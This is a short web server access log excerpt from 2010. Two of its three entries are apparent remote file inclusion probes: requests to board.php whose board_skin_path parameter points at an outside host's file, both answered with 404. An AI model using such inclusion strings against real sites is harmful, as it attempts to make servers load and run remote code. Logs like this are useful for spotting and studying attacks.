212.241.177.123 - - [15/Feb/2010:04:36:51 -0500] "GET /logs/access_log.Q109073100//board.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.241.177.123 - - [15/Feb/2010:04:36:51 -0500] "GET /logs//board.php?board_skin_path=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
95.108.128.242 - - [15/Feb/2010:04:37:28 -0500] "GET /images/_notes/download_order_sm.jpg.mno HTTP/1.1" 200